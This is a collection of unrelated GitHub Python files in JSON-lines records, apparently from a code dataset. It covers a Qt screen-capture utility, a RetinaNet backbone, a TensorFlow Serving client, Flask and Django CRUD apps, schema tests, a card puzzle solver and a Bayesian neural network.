self.setAttribute(QtCore.Qt.WA_DeleteOnClose)\n self.captureDesktop()\n\n def paintEvent(self, event):\n painter = QtGui.QPainter(self)\n painter.drawPixmap(0, 0, self.desktopPixmap)\n\n pen = QtGui.QPen(QtCore.Qt.red, 3)\n painter.setPen(pen)\n\n path = QtGui.QPainterPath()\n path.addRect(self.rect())\n path.addRect(self.selectedRect)\n painter.fillPath(path, QtGui.QColor.fromRgb(255, 255, 255, 100))\n\n painter.drawRect(self.selectedRect)\n\n def mousePressEvent(self, event):\n posInWin = self.window().mapFromGlobal(event.globalPos())\n self.startPos = posInWin\n self.selectedRect.setTopLeft(posInWin)\n\n def mouseMoveEvent(self, event):\n posInWin = 
self.window().mapFromGlobal(event.globalPos())\n\n if event.modifiers() == QtCore.Qt.Key_Escape:\n self.ignore()\n\n if event.modifiers() == QtCore.Qt.ShiftModifier:\n width = posInWin.x() - self.startPos.x()\n squareBtmRightPos = QtCore.QPoint(self.startPos.x()+width, self.startPos.y()+width)\n self.selectedRect.setBottomRight(squareBtmRightPos)\n self.lastSelRectWidth = width\n elif event.modifiers() == (QtCore.Qt.ShiftModifier | QtCore.Qt.AltModifier):\n topLeftPos = QtCore.QPoint(posInWin.x()-self.lastSelRectWidth, posInWin.y()-self.lastSelRectWidth)\n self.selectedRect.setTopLeft(topLeftPos)\n self.selectedRect.setBottomRight(posInWin)\n self.startPos = topLeftPos\n else:\n self.selectedRect.setBottomRight(posInWin)\n\n self.update()\n\n def mouseReleaseEvent(self, event):\n self.capturedPixmap = self.desktopPixmap.copy(self.selectedRect.normalized())\n self.capturedPixmap.save('D:/test.png', 'PNG')\n self.accept()\n\n def captureDesktop(self):\n screenGeometry = QtCore.QRect(QtWidgets.QApplication.primaryScreen().virtualGeometry())\n self.desktopPixmap = QtGui.QPixmap.grabWindow(\n QtWidgets.QApplication.desktop().winId(),\n screenGeometry.x(),\n screenGeometry.y(),\n screenGeometry.width(),\n screenGeometry.height(),\n )\n\n\ndef duplicateImage(imagePath, suffix='_copy'):\n folder = os.path.dirname(imagePath)\n origFileName, ext = os.path.splitext(os.path.basename(imagePath))\n newFileName = '{}{}{}'.format(origFileName, suffix, ext)\n newImagePath = os.path.join(folder, newFileName)\n\n qimg = QtGui.QImage(imagePath)\n qimg.save(newImagePath, ext.strip('.'))\n\n\ndef editScriptEditorHorizontal():\n panel = None\n allPanels = pm.getPanel(all=True)\n for item in allPanels:\n if \"scriptEditorPanel\" in item:\n panel = item\n\n if not panel:\n print(\"Not found script editor panel.\")\n return\n\n qtpanel = panel.asQtObject()\n\n menuBar, mainWidget = qtpanel.children()[1:]\n\n seww = mainWidget.layout().itemAt(1).widget()\n sewww = seww.children()[-1]\n\n splitter = sewww.children()[1]\n splitter.setOrientation(QtCore.Qt.Orientation.Horizontal)\n\n script_console = splitter.widget(0)\n script_editor = splitter.widget(1)\n\n splitter.insertWidget(0, script_editor)\n\n se_splitter = script_editor.children()[1]\n\n editor = se_splitter.children()[1]\n tabWidget = editor.children()[1]\n\n tabWidget.setTabPosition(QtWidgets.QTabWidget.TabPosition.North)\n","repo_name":"LEESANGTAK/takTools","sub_path":"scripts/takTools/utils/qtUtil.py","file_name":"qtUtil.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"}
+{"seq_id":"42580864473","text":"from tensorflow import keras\n\nfrom . import retinanet\nfrom . import Backbone\nfrom ..utils.image import preprocess_image\n\n\nallowed_backbones = {\n 'densenet121': ([6, 12, 24, 16], keras.applications.densenet.DenseNet121),\n 'densenet169': ([6, 12, 32, 32], keras.applications.densenet.DenseNet169),\n 'densenet201': ([6, 12, 48, 32], keras.applications.densenet.DenseNet201),\n}\n\n\nclass DenseNetBackbone(Backbone):\n \"\"\" Describes backbone information and provides utility functions.\n \"\"\"\n\n def retinanet(self, *args, **kwargs):\n \"\"\" Returns a retinanet model using the correct backbone.\n \"\"\"\n return densenet_retinanet(*args, backbone=self.backbone, **kwargs)\n\n def download_imagenet(self):\n \"\"\" Download pre-trained weights for the specified backbone name.\n This name is in the format {backbone}_weights_tf_dim_ordering_tf_kernels_notop\n where backbone is the densenet + number of layers (e.g. densenet121).\n For more info check the explanation from the keras densenet script itself:\n https://github.com/keras-team/keras/blob/master/keras/applications/densenet.py\n \"\"\"\n origin = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.8/'\n file_name = '{}_weights_tf_dim_ordering_tf_kernels_notop.h5'\n\n # load weights\n if keras.backend.image_data_format() == 'channels_first':\n raise ValueError('Weights for \"channels_first\" format are not available.')\n\n weights_url = origin + file_name.format(self.backbone)\n return keras.utils.get_file(file_name.format(self.backbone), weights_url, cache_subdir='models')\n\n def validate(self):\n \"\"\" Checks whether the backbone string is correct.\n \"\"\"\n backbone = self.backbone.split('_')[0]\n\n if backbone not in allowed_backbones:\n raise ValueError('Backbone (\\'{}\\') not in allowed backbones ({}).'.format(backbone, allowed_backbones.keys()))\n\n def preprocess_image(self, inputs):\n \"\"\" Takes as input an image and prepares it for being passed through the network.\n \"\"\"\n return preprocess_image(inputs, mode='tf')\n\n\ndef densenet_retinanet(num_classes, backbone='densenet121', inputs=None, modifier=None, **kwargs):\n \"\"\" Constructs a retinanet model using a densenet backbone.\n\n Args\n num_classes: Number of classes to predict.\n backbone: Which backbone to use (one of ('densenet121', 'densenet169', 'densenet201')).\n inputs: The inputs to the network (defaults to a Tensor of shape (None, None, 3)).\n modifier: A function handler which can modify the backbone before using it in retinanet (this can be used to freeze backbone layers for example).\n\n Returns\n RetinaNet model with a DenseNet backbone.\n \"\"\"\n # choose default input\n if inputs is None:\n inputs = keras.layers.Input((None, None, 3))\n\n blocks, creator = allowed_backbones[backbone]\n model = creator(input_tensor=inputs, include_top=False, pooling=None, weights=None)\n\n # get last conv layer from the end of each dense block\n layer_outputs = [model.get_layer(name='conv{}_block{}_concat'.format(idx + 2, block_num)).output for idx, block_num in enumerate(blocks)]\n\n # create the densenet backbone\n # layer_outputs contains 4 layers\n model = keras.models.Model(inputs=inputs, outputs=layer_outputs, name=model.name)\n\n # invoke modifier if given\n if modifier:\n model = modifier(model)\n\n # create the full model\n backbone_layers = {\n 'C2': model.outputs[0],\n 'C3': model.outputs[1],\n 'C4': model.outputs[2],\n 'C5': model.outputs[3]\n }\n\n model = retinanet.retinanet(inputs=inputs, num_classes=num_classes, backbone_layers=backbone_layers, **kwargs)\n\n return model\n","repo_name":"OlafenwaMoses/ImageAI","sub_path":"imageai_tf_deprecated/Detection/keras_retinanet/models/densenet.py","file_name":"densenet.py","file_ext":"py","file_size_in_byte":3814,"program_lang":"python","lang":"en","doc_type":"code","stars":8143,"dataset":"github-code","pt":"65"}
+{"seq_id":"35681189324","text":"\"\"\"Translation client common functions\n\nModified opennmt-tf example using some ideas from\ntensorflow serving mnist example.\n.\"\"\"\n\nfrom __future__ import print_function\nimport tensorflow as tf\n\nfrom tensorflow_serving.apis import predict_pb2\n\nimport codecs\n\n\ndef parse_translation_result(result, sentence_processor):\n \"\"\"Parses a translation result.\n\n Args:\n result: A `PredictResponse` proto.\n sentence_processor: A `sentencepiece.SentenceProcessor`\n\n Returns:\n A result string\n \"\"\"\n lengths = tf.make_ndarray(result.outputs[\"length\"])[0]\n hypotheses = tf.make_ndarray(result.outputs[\"tokens\"])[0]\n\n # Only consider the first hypothesis (the best one).\n best_hypothesis = hypotheses[0]\n best_length = lengths[0]\n model_out = best_hypothesis[0:best_length - 1] # Ignore \n pieces = sentence_processor.DecodePieces(list(model_out))\n return codecs.decode(pieces)\n\n\ndef translate(stub, model_name, sentence_processor,\n input_string, timeout=5.0):\n \"\"\"Translates a sequence of tokens.\n\n Args:\n stub: The prediction service stub.\n model_name: The model to request.\n sentence_processor: A `sentencepience.SentenceProcessor`\n input_string: The input string\n timeout: Timeout after this many seconds.\n\n Returns:\n A future.\n \"\"\"\n tokens = sentence_processor.EncodeAsPieces(input_string)\n length = len(tokens)\n\n request = predict_pb2.PredictRequest()\n request.model_spec.name = model_name\n request.inputs[\"tokens\"].CopyFrom(\n tf.make_tensor_proto([tokens], shape=(1, length)))\n request.inputs[\"length\"].CopyFrom(\n tf.make_tensor_proto([length], shape=(1,)))\n\n return stub.Predict.future(request, timeout)\n","repo_name":"avinashvarna/sanskrit_nmt","sub_path":"sandhi_split/transformer_small_vocab/client_common.py","file_name":"client_common.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"65"}
+{"seq_id":"73440596686","text":"from flask import Blueprint, render_template, redirect, request\nfrom app.db import db\n# from app.models.task import Task\nfrom datetime import datetime\nfrom bson.objectid import ObjectId\nfrom bson import json_util\nimport json\nfrom pymongo import ReturnDocument\n\ntask_router = Blueprint(\"task_router\", __name__)\n\n#\n# Inicio de las rutas del app (sección tareas):\n#\n@task_router.route(\"/\")\ndef index():\n # task_list = Task.query.all() # SELECT * FROM task\n tasks = db.tasks.find()\n task_list = list(tasks)\n return render_template(\"index.html\", lista_tareas=task_list)\n\n@task_router.route(\"/add\", methods=[\"POST\"])\ndef add():\n task_text = request.form.get(\"text\") # Recupero lo que viene en el input del form\n if task_text == \"\" or task_text == None:\n return redirect(\"/\")\n \n newTask = {\n \"text\": task_text,\n \"createdAt\": datetime.now(),\n \"doneAt\": None,\n \"deletedAt\": None,\n }\n db.tasks.insert_one(newTask)\n\n # newTask = Task(text=task_text, createdAt=datetime.now())\n # db.session.add(newTask) # Por dentro creará el SQL COMMAND: INSERT\n # db.session.commit() # Envia los SQL COMMAND al motor de DB.\n return redirect(\"/\")\n\n\n@task_router.route(\"/update/<id>\", 
methods=[\"PUT\"])\ndef update(id):\n # task = Task.query.get(id)\n text = request.form.get(\"text\")\n task = db.tasks.find_one_and_update({'_id':ObjectId(id)}, {\"$set\": {\"text\": text}}, upsert=False, return_document=ReturnDocument.AFTER)\n return parse_json(task), 200\n\ndef parse_json(data):\n return json.loads(json_util.dumps(data))\n\n\n@task_router.route(\"/task\", defaults={'id': None})\n@task_router.route(\"/task/\", defaults={'id': None})\n@task_router.route(\"/task/\")\n\ndef task(id = None):\n # Si no me envias un ID, te regreso a index:\n if id == None:\n return redirect(\"/\")\n # Si me envias un ID entonces trato de extraer la tarea con ese ID:\n # task = Task.query.get(id)\n task = db.tasks.find_one(ObjectId(id))\n print(task['text'])\n if task == None:\n return redirect(\"/\")\n # Si la tarea NO ESTA VACIA = la encontré. Entonces se la mando al template:\n return render_template(\"detail.html\", task=task)\n\n@task_router.route(\"/done\", methods=[\"POST\"])\ndef done():\n task_id = request.form.get(\"id\")\n next = request.form.get(\"next\")\n task = db.tasks.find_one_and_update({'_id':ObjectId(task_id)}, {\"$set\": {\"doneAt\": datetime.now()}}, upsert=False, return_document=ReturnDocument.AFTER)\n # task = Task.query.get(task_id)\n if task == None:\n return redirect(\"/\")\n # # Si existe la tarea:\n # task.doneAt = datetime.now()\n # db.session.commit()\n # finish:\n if next != None:\n return redirect(next)\n return redirect(\"/task/\" + str(task_id))\n\n@task_router.route(\"/delete/\")\ndef delete(id):\n task = db.tasks.find_one_and_update({'_id':ObjectId(id)}, {\"$set\": {\"deletedAt\": datetime.now()}}, upsert=False, return_document=ReturnDocument.AFTER)\n # task = Task.query.get(id)\n if task == None:\n return redirect(\"/\")\n # Si existe la tarea:\n # task.deletedAt = datetime.now()\n # db.session.commit()\n return redirect(\"/task/\" + str(id))","repo_name":"bdiazc90/flask-todoapp-sqlite","sub_path":"app/routes/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":3184,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"65"} +{"seq_id":"40009552580","text":"from tkinter.constants import X\nfrom matplotlib.animation import AVConvFileWriter\nimport numpy as np\nfrom numpy import linalg as LA\n\nGaussianBasisSigma = 0.5\n\ndef groundTruthProcess(x, bias = 0.0, func = 'sin(2pix)'):\n \"\"\"Computes underlying function 'func' we wish to discover.\n \n @param x N-dimentional vector of input data.\n @param bias bias of the function.\n @param func true function itself.\n\n @return N-dimentional target vector of function values.\n \"\"\"\n\n if func == 'sin(2pix)':\n return bias + np.sin(2*np.pi*x)\n elif func == 'x+0.3sin(2pix)':\n return x + 0.3 * np.sin(2*np.pi*x)\n elif func == 'exp(x)':\n return bias + np.exp(x)\n elif func == 'x^2':\n return bias + x**2\n elif func == '|x|':\n return bias + np.abs(x)\n elif func == 'H(x)':\n return bias + np.heaviside(x, 0.5)\n \n return bias + np.sin(2*np.pi*x)\n\ndef generateData(N, low = -1.0, high = 1.0, func = 'sin(2pix)', bias = 0.0, noise_level = 0.3):\n \"\"\"Generates data from some stochastic process (governed by \"groundTruthProcess\" function) with gaussian noise.\n \n @param N desierd number of data points.\n @param low low boundary of data points.\n @param high high boundary of data points.\n @param bias bias of the function.\n @param noise_level noise level of the function.\n\n @return N-dimentional target vector of stochastic process values.\n \"\"\"\n\n x 
= np.random.uniform(low, high, size = N)\n t = groundTruthProcess(x, bias, func) + np.random.normal(0, noise_level, size = N)\n return x, t\n\ndef trainTestSplit(X, t, test_rate = 0.2):\n N = X.shape[0]\n rand_idx = np.random.choice(N, N, replace = False)\n valid_idx = rand_idx[:int(N * test_rate)]\n train_idx = rand_idx[int(N * test_rate):]\n return X[train_idx], t[train_idx], X[valid_idx], t[valid_idx]\n\n\nclass SimpleFeedForwardNetwork():\n \"\"\"Simple two-layer (hidden + output) feed-forward neural network\n performing regression for one target variable.\n \"\"\"\n\n def __init__(self, NHiddenUnits) -> None:\n biasUnit = 1\n self.inputDim = 1 + biasUnit\n self.NInputUnits = 1 + biasUnit\n self.NHiddenUnits = NHiddenUnits + biasUnit\n self.NOutputUnits = 1\n self.w1 = np.random.normal(0.0, 0.2, size = (self.inputDim, self.NHiddenUnits))\n self.w2 = np.random.normal(0.0, 0.2, size = (self.NHiddenUnits, self.NOutputUnits))\n self.totalW = self.w1.size + self.w2.size\n self.W = np.zeros(self.totalW, dtype = np.float32)\n self.A = np.zeros((self.totalW, self.totalW), dtype = np.float32)\n self.al = 0.0\n self.bt = 1.0\n self.lmbd = 0.0\n\n def fit(self, X, t, epochs = 100, batch_size = 32, learning_rate = 0.1, lmbd = 0.0, al = 0.0, bt = 1.0, verbose = False):\n \"\"\"Trains network using SGD.\n\n @param X NxD feature matrix of input data.\n @param t N-dimentional target vector of input data.\n @param epochs epoch number.\n @param batch_size batch number.\n @param learning_rate learning rate for SGD.\n @param lmbd regularization coefficient.\n @param al precision (inverse variance) of the prior weight distribution.\n @param bt precision (inverse variance) of input data.\n @param verbose do print detailed info.\n \"\"\"\n\n self.al = al\n self.bt = bt\n self.lmbd = lmbd\n\n verboseInterval = epochs // 20\n if verboseInterval == 0:\n verboseInterval = 1\n\n N = X.size // self.inputDim\n X_train, t_train, X_valid, t_valid = trainTestSplit(X, t)\n for e in range(epochs):\n y_pred = np.zeros_like(t_train)\n for n, (x, tn) in enumerate(zip(X_train, t_train)):\n y, z = self.forward(x)\n y_pred[n] = y\n w1_grad, w2_grad = self.backward(y, tn, z, x)\n self.w1 = self.w1 - learning_rate * (w1_grad + self.lmbd * self.w1)\n self.w2 = self.w2 - learning_rate * (w2_grad + self.lmbd * self.w2)\n\n # rand_idx = np.random.choice(N, N, replace = False)\n # train_idx = rand_idx[:int(N * 0.8)]\n # valid_idx = rand_idx[int(N * 0.8):]\n # y_pred = np.zeros_like(rand_idx)\n # t_pred = np.take(t, train_idx)\n\n # iterNum = N // batch_size\n # w1_grad = np.zeros_like(self.w1)\n # w2_grad = np.zeros_like(self.w2) \n # for i in range(iterNum):\n # batch_rand_idx = rand_idx[i * batch_size : (i + 1) * batch_size]\n # for n in batch_rand_idx:\n # y, z = self.forward(X[n])\n # y_pred[n] = y\n # w1_grad_now, w2_grad_now = self.backward(y, t[n], z, X[n])\n # w1_grad += w1_grad_now\n # w2_grad += w2_grad_now\n # self.w1 -= learning_rate * w1_grad\n # self.w2 -= learning_rate * w2_grad\n\n # for n in train_idx:\n # y, z = self.forward(X[n])\n # y_pred[n] = y\n # w1_grad, w2_grad = self.backward(y, t[n], z, X[n])\n # self.w1 -= learning_rate * w1_grad\n # self.w2 -= learning_rate * w2_grad\n\n y_valid_pred = np.zeros_like(t_valid)\n for n, (x, tn) in enumerate(zip(X_valid, t_valid)):\n y, _ = self.forward(x)\n y_valid_pred[n] = y\n\n if verbose and e % verboseInterval == 0:\n loss = self.RMS(y_pred, t_train)\n valid_loss = self.RMS(y_valid_pred, t_valid)\n print(\">>> epoch {0}\".format(e), \"train loss (RMS): 
{0}\".format(loss), \"valid loss (RMS): {0}\".format(valid_loss), sep = ', ')\n\n # Combine all weights into one vector for convenience\n self.W = np.concatenate((self.w1.flatten(), self.w2.flatten()))\n\n # Evaluate posterior distribution parameters\n _, self.A = self.wPosteriorParams(X, t)\n\n def forward(self, x):\n \"\"\"Computes forward propagation.\n\n @param x D-dimentional vector of input data.\n\n @return Network output.\n \"\"\"\n \n a = np.zeros(self.NHiddenUnits, dtype = np.float32)\n for j in range(self.NHiddenUnits):\n for i in range(self.NInputUnits):\n a[j] += self.w1[i, j] * x[i]\n\n z = np.tanh(a)\n\n y = np.zeros(self.NOutputUnits, dtype = np.float32)\n for k in range(self.NOutputUnits):\n for j in range(self.NHiddenUnits):\n y[k] += self.w2[j, k] * z[j]\n return y, z\n\n def backward(self, y, t, z, x):\n \"\"\"Computes backward propagation.\n\n @param y network output.\n @param t ground-truth target.\n @param z hidden activation output.\n @param x network input.\n\n @return Weight gradients.\n \"\"\"\n\n delta_output = (y - t)\n\n delta_hidden = np.zeros(self.NHiddenUnits, dtype = np.float32)\n for j in range(self.NHiddenUnits):\n for k in range(self.NOutputUnits):\n delta_hidden[j] += self.w2[j, k] * delta_output\n delta_hidden *= (1 - z**2)\n\n w1_grad = np.zeros_like(self.w1)\n for j in range(w1_grad.shape[1]):\n for i in range(w1_grad.shape[0]):\n w1_grad[i, j] = delta_hidden[j] * x[i]\n\n w2_grad = np.zeros_like(self.w2)\n for k in range(w2_grad.shape[1]):\n for j in range(w2_grad.shape[0]):\n w2_grad[j, k] = delta_output[k] * z[j]\n\n # w1_grad = np.outer(x, delta_hidden)\n # w2_grad = np.outer(z, delta_output)\n return w1_grad, w2_grad\n\n def calculateHessian(self, X, t):\n \"\"\"Evaluates Hessian by Outer Product Approximation.\n \n @param X NxD feature matrix of input data.\n @param t N-dimentional target vector of input data.\n\n @return Hessian matrix.\n \"\"\"\n\n Hessian = np.zeros((self.totalW, self.totalW), dtype = np.float32)\n\n for n, (x, tn) in enumerate(zip(X, t)):\n\n # Get ∇y\n y, z = self.forward(x)\n delta_hidden = np.zeros(self.NHiddenUnits, dtype = np.float32)\n for j in range(self.NHiddenUnits):\n for k in range(self.NOutputUnits):\n delta_hidden[j] += self.w2[j, k]\n delta_hidden *= (1 - z**2)\n w1_grad = np.zeros_like(self.w1)\n for j in range(w1_grad.shape[1]):\n for i in range(w1_grad.shape[0]):\n w1_grad[i, j] = delta_hidden[j] * x[i]\n w2_grad = np.zeros_like(self.w2)\n for k in range(w2_grad.shape[1]):\n for j in range(w2_grad.shape[0]):\n w2_grad[j, k] = z[j]\n\n # Approximate Hessian\n b = np.concatenate((w1_grad.flatten(), w2_grad.flatten()))\n Hessian += np.outer(b, b.T)\n \n return Hessian\n\n def wPosteriorParams(self, X, t, al = 0.0, bt = 0.0):\n \"\"\"Evaluates p(w|α) parameters by local Gaussian approximation.\n \n @param X NxD feature matrix of input data.\n @param t N-dimentional target vector of input data.\n @param al precision (inverse variance) of the prior weight distribution.\n @param bt precision (inverse variance) of input data.\n\n @return p(w|α) parameters.\n \"\"\"\n\n Hessian = self.calculateHessian(X, t)\n\n al = self.al if al == 0.0 else al\n bt = self.bt if bt == 0.0 else bt\n A = al * np.identity(self.totalW) + bt * Hessian\n\n return Hessian, A\n\n def hyperparameterOptimization_experimental(self, X, t, a0, b0):\n\n N = t.size\n a = a0\n b = b0\n\n eps = 10**-2\n doStop = False\n aFound = False\n bFound = False\n itr = 0\n maxIter = 100\n while not doStop and itr < maxIter:\n a_prev = a\n b_prev = b\n lmbd = 
a / b\n\n # Calculate γ\n H, A = self.wPosteriorParams(X, t)\n eig_w, _ = LA.eig( b * H )\n\n # Update α\n gamma = np.sum( eig_w / (a + eig_w) )\n a = gamma / (self.W.T @ self.W)\n\n # Update β\n sum_of_sq = 0.0\n for i in range(N):\n sum_of_sq += (t[i] - float(self.forward(X[i])[0]))**2\n b = 1 / ( (1 / (N - gamma)) * sum_of_sq )\n\n dff1 = np.abs(a - a_prev)\n dff2 = np.abs(b - b_prev)\n if dff1 < eps:\n aFound = True\n if dff2 < eps:\n bFound = True\n if aFound and bFound:\n doStop = True\n itr += 1\n\n return a, b\n\n def predictBayesian(self, x):\n \"\"\"Computes predictive distribution p(t|x, D, α, β).\n\n @param x new unobserved data point.\n\n @return Estimated mean and sigma of the predictive distribution\n \"\"\"\n\n y, z = self.forward(x)\n\n delta_hidden = np.zeros(self.NHiddenUnits, dtype = np.float32)\n for j in range(self.NHiddenUnits):\n for k in range(self.NOutputUnits):\n delta_hidden[j] += self.w2[j, k]\n delta_hidden *= (1 - z**2)\n\n w1_grad = np.zeros_like(self.w1)\n for j in range(w1_grad.shape[1]):\n for i in range(w1_grad.shape[0]):\n w1_grad[i, j] = delta_hidden[j] * x[i]\n\n w2_grad = np.zeros_like(self.w2)\n for k in range(w2_grad.shape[1]):\n for j in range(w2_grad.shape[0]):\n w2_grad[j, k] = z[j]\n\n g = np.concatenate((w1_grad.flatten(), w2_grad.flatten()))\n sigma2 = 0.0000001\n if LA.det(self.A) > 0:\n A_inv = LA.inv(self.A)\n sigma2 = 1/self.bt + g.T @ A_inv @ g\n\n return y, np.sqrt(sigma2)\n\n def loss(self, y, t):\n \"\"\"Computes sum-of-squares loss function.\n\n @param y network output.\n @param t ground-truth target.\n\n @return loss.\n \"\"\"\n\n return np.sum( (y - t)**2 ) / 2\n\n def RMS(self, y, t):\n \"\"\"Computes root-mean-square function.\n\n @param y network output.\n @param t ground-truth target.\n\n @return loss.\n \"\"\"\n\n N = t.size\n return np.sqrt( (2 * self.loss(y, t)) / N )","repo_name":"matkovst/Bishop-PRML-demos","sub_path":"05-Neural-Networks/model_specific.py","file_name":"model_specific.py","file_ext":"py","file_size_in_byte":12266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"28518948510","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .models import Cliente\nfrom .forms import ClienteForm, CadastroForm\nfrom django.contrib.auth.decorators import login_required\nimport requests\n\ndef home(request):\n response = requests.get('viacep.com.br/ws/%s/json')\n print(response)\n\n\n\ndef usuarioCreate(request):\n form = CadastroForm(request.POST or None)\n\n if form.is_valid():\n form.save()\n return redirect('clienteList')\n\n return render(request, 'registration/cadastro.html', {'form': form})\n\n'''Importando login required para pedir login\n quem entrar como admin vai poder ver.\n '''\n\n@login_required\ndef clienteList(request):\n clientes = Cliente.objects.all()\n\n return render(request, 'clienteList.html', {'clientes': clientes})\n\n\n@login_required\ndef clienteCreate(request):\n form = ClienteForm(request.POST or None)\n\n if form.is_valid():\n form.save()\n return redirect('clienteList')\n\n return render(request, 'clienteCreate.html', {'form': form})\n\n\n@login_required\ndef clienteUpdate(request, id):\n cliente = get_object_or_404(Cliente, pk=id)\n form = ClienteForm(request.POST or None, instance=cliente)\n\n if form.is_valid():\n form.save()\n return redirect('clienteList')\n\n return render(request, 'clienteCreate.html', {'form': form})\n\n\n@login_required\ndef clienteDelete(request, id):\n cliente = 
get_object_or_404(Cliente, pk=id)\n\n if request.method == 'POST':\n cliente.delete()\n return redirect('clienteList')\n\n return render(request, 'clienteDelete.html', {'cliente': cliente})\n\n@login_required\ndef clienteRead(request, id):\n cliente = get_object_or_404(Cliente, pk=id)\n form = ClienteForm(request.POST or None, instance=cliente)\n\n return render(request, 'clienteRead.html', {'cliente': cliente, 'form': form})\n\n\n\n'''Função de cadastro'''\n\ndef cadastro(request):\n if request.method == 'POST':\n form = CadastroForm(request.POST or None)\n if form.is_valid():\n form.save()\n return redirect('home')\n else:\n form = CadastroForm()\n return render(request, 'registration/cadastro.html', {'form': form})\n\n","repo_name":"Tallesecs/WebSite-para-cadastros-utilizando-APIS","sub_path":"clienteApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"26394639367","text":"from sqlschm import sql\n\nTABLE_A = sql.Table(\n name=(\"A\",),\n columns=(sql.Column(name=\"a\"),),\n constraints=(sql.Uniqueness(indexed=(sql.Indexed(column=\"a\"),), is_primary=True),),\n)\nTABLE_B = sql.Table(\n name=(\"B\",),\n columns=(sql.Column(name=\"b\"),),\n constraints=(sql.Uniqueness(indexed=(sql.Indexed(column=\"b\"),), is_primary=True),),\n)\nFK_A = sql.ForeignKey(columns=(\"a\",), foreign_table=(\"A\",), referred_columns=(\"a\",))\nFK_B = sql.ForeignKey(columns=(\"b\",), foreign_table=(\"B\",))\nTABLE_C = sql.Table(\n name=(\"C\",),\n columns=(sql.Column(name=\"a\"), sql.Column(name=\"b\")),\n constraints=(\n sql.Uniqueness(\n indexed=(sql.Indexed(column=\"a\"), sql.Indexed(column=\"b\")), is_primary=True\n ),\n FK_A,\n FK_B,\n ),\n)\nFK_C = sql.ForeignKey(\n columns=(\"x\", \"y\"),\n foreign_table=(\"C\",),\n referred_columns=(\"b\", \"a\"),\n)\nTABLE_D = sql.Table(\n name=(\"D\",),\n columns=(sql.Column(name=\"x\"), sql.Column(name=\"y\")),\n constraints=(\n sql.Uniqueness(\n indexed=(sql.Indexed(column=\"x\"), sql.Indexed(column=\"y\")), is_primary=True\n ),\n FK_C,\n ),\n)\nSYMBOLS = {\n \"A\": TABLE_A,\n \"B\": TABLE_B,\n \"C\": TABLE_C,\n \"D\": TABLE_D,\n}\nSCHEMA = sql.Schema(items=(TABLE_A, TABLE_B, TABLE_C, TABLE_D))\n\n\ndef test_symbols() -> None:\n assert sql.symbols(SCHEMA) == SYMBOLS\n\n\ndef test_referred_columns() -> None:\n assert sql.referred_columns(FK_A, SYMBOLS) == (\"a\",)\n assert sql.referred_columns(FK_B, SYMBOLS) == (\"b\",)\n assert sql.referred_columns(FK_C, SYMBOLS) == (\"b\", \"a\")\n\n\ndef test_resolve_foreign_key() -> None:\n assert tuple(sql.resolve_foreign_key(FK_A, \"a\", SYMBOLS)) == (\"a\",)\n assert tuple(sql.resolve_foreign_key(FK_B, \"b\", SYMBOLS)) == (\"b\",)\n assert tuple(sql.resolve_foreign_key(FK_C, \"x\", SYMBOLS)) == (\n FK_B,\n \"b\",\n )\n assert tuple(sql.resolve_foreign_key(FK_C, \"y\", SYMBOLS)) == (\n FK_A,\n \"a\",\n )\n","repo_name":"coast-team/sqlschm","sub_path":"tests/test_sql.py","file_name":"test_sql.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"65"} +{"seq_id":"25636764154","text":"\nimport itertools\n\n\ndef create_board(permutation):\n board = {}\n for i in range(len(permutation)):\n board[i] = permutation[i]\n return board\n\ndef print_board(board):\n print(\"\\t\\t{}\\t\\t\".format(board[0]))\n print(\"{}\\t{}\\t{}\\t\\t\".format(board[1], board[2], board[3]))\n print(\"\\t{}\\t{}\\t{}\\t\".format(board[4], 
board[5], board[6]))\n print(\"\\t\\t{}\\t\\t\".format(board[7]))\n\ndef print_solutions(solutions):\n for solution in solutions:\n print(\"Found solution after {} iterations\".format(solution[1]))\n print_board(solution[0])\n print(\"Found {} solutions\".format(len(solutions)))\n\n\ndef create_permutations():\n cards = ['A', 'A', 'H', 'H', 'V', 'V', 'B', 'B']\n permutations = set(itertools.permutations(cards))\n return permutations\n\ndef get_neighbors(board, i):\n neighbors = {\n 0: [3], \n 1: [2], \n 2: [1, 3, 4],\n 3: [0, 2, 5],\n 4: [2, 5],\n 5: [3, 4, 6, 7],\n 6: [5],\n 7: [5],\n }\n return [board[n] for n in neighbors[i]]\n\n\ndef test_card(card, neighbors):\n if card in neighbors:\n # twee kaarten van dezelfde soort mogen geen buren zijn\n return False\n if card == 'A':\n if 'V' in neighbors:\n # elke Aas grenst NIET aan een Vrouw\n return False\n elif not 'H' in neighbors:\n # elke Aas grenst aan een Heer\n return False\n if card == 'H' and not 'V' in neighbors:\n # elke Heer grenst aan een Vrouw\n return False\n if card == 'V' and not 'B' in neighbors:\n # elke Vrouw grenst aan een Boer\n return False\n # kaart grenst niet aan de juiste kaart\n return True\n\ndef test_board(board):\n for index in board.keys():\n neighbors = get_neighbors(board, index)\n card = board[index]\n if not test_card(card, neighbors):\n return False\n return True\n\ndef test_all():\n permutations = create_permutations()\n iterations_count = 0\n solutions = []\n for permutation in permutations:\n iterations_count += 1\n board = create_board(permutation) \n if test_board(board):\n if not board in solutions:\n solutions.append((board, iterations_count))\n print_solutions(solutions)\n\ntest_all()\n\n# A. \n# 1. Er zijn 2520 permutaties mogelijk \n# 2. Er moeten 1582 iteraties worden gedaan voor de eerste oplossing is gevonden\n","repo_name":"angelo-wf/Exercises-Hanze-4","sub_path":"AI/week3/opdracht2a.py","file_name":"opdracht2a.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"43805532635","text":"import time\n\nimport numpy as np\nimport os\n\nfrom data.data_manager import get_data_chunk\nfrom expert.basic_expert import Expert, Action\nfrom trading import TradeAction\nfrom trading_expert.trail_on_error import 